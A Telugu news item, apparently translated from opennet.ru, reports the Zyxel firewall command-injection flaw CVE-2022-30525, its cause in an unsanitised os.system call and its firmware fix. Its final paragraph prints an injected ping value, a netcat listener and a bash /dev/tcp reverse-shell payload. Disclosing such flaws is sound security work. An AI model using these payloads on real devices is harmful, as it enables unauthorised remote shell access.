ప్రమాణీకరణ లేకుండా కోడ్ అమలును అనుమతించే Zyxel ఫైర్‌వాల్‌లలో దుర్బలత్వం

ATP, VPN మరియు USG FLEX సిరీస్‌ల యొక్క Zyxel పరికరాలలో క్లిష్టమైన దుర్బలత్వం (CVE-2022-30525) గుర్తించబడింది, ఇది ఫైర్‌వాల్‌లు, IDS మరియు VPNలను ఎంటర్‌ప్రైజెస్‌లో నిర్వహించడానికి రూపొందించబడింది, ఇది బాహ్య దాడి చేసే వ్యక్తిని కోడ్‌ని అమలు చేయడానికి అనుమతిస్తుంది. ప్రమాణీకరణ లేకుండా వినియోగదారు హక్కులు లేని పరికరం. దాడిని నిర్వహించడానికి, దాడి చేసే వ్యక్తి తప్పనిసరిగా HTTP/HTTPS ప్రోటోకాల్‌ని ఉపయోగించి పరికరానికి అభ్యర్థనలను పంపగలగాలి. Zyxel ZLD 5.30 ఫర్మ్‌వేర్ అప్‌డేట్‌లో దుర్బలత్వాన్ని పరిష్కరించింది. షోడాన్ సేవ ప్రకారం, HTTP/HTTPS ద్వారా అభ్యర్థనలను ఆమోదించే గ్లోబల్ నెట్‌వర్క్‌లో ప్రస్తుతం 16213 హాని కలిగించే పరికరాలు ఉన్నాయి.

వెబ్ హ్యాండ్లర్ /ztp/cgi-bin/handlerకి ప్రత్యేకంగా రూపొందించిన ఆదేశాలను పంపడం ద్వారా ఆపరేషన్ నిర్వహించబడుతుంది, ప్రామాణీకరణ లేకుండా యాక్సెస్ చేయవచ్చు. lib_wan_settings.py లైబ్రరీలో ఉపయోగించబడుతుంది మరియు setWanPortSt ఆపరేషన్‌ను ప్రాసెస్ చేస్తున్నప్పుడు అమలు చేయబడిన os.system కాల్‌ని ఉపయోగించి సిస్టమ్‌పై ఆదేశాలను అమలు చేస్తున్నప్పుడు అభ్యర్థన పారామితుల యొక్క సరైన క్లీనప్ లేకపోవడం వల్ల సమస్య ఏర్పడుతుంది.

ఉదాహరణకు, దాడి చేసే వ్యక్తి "; పింగ్ 192.168.1.210;" ఇది సిస్టమ్‌లో "పింగ్ 192.168.1.210" కమాండ్ అమలుకు దారి తీస్తుంది. కమాండ్ షెల్‌కు యాక్సెస్ పొందడానికి, మీరు మీ సిస్టమ్‌లో “nc -lvnp 1270”ని అమలు చేయవచ్చు, ఆపై 'తో పరికరానికి అభ్యర్థనను పంపడం ద్వారా రివర్స్ కనెక్షన్‌ని ప్రారంభించవచ్చు; bash -c \»exec bash -i &>/dev/tcp/192.168.1.210/1270 <&1;\»;'.

మూలం: opennet.ru

ఒక వ్యాఖ్యను జోడించండి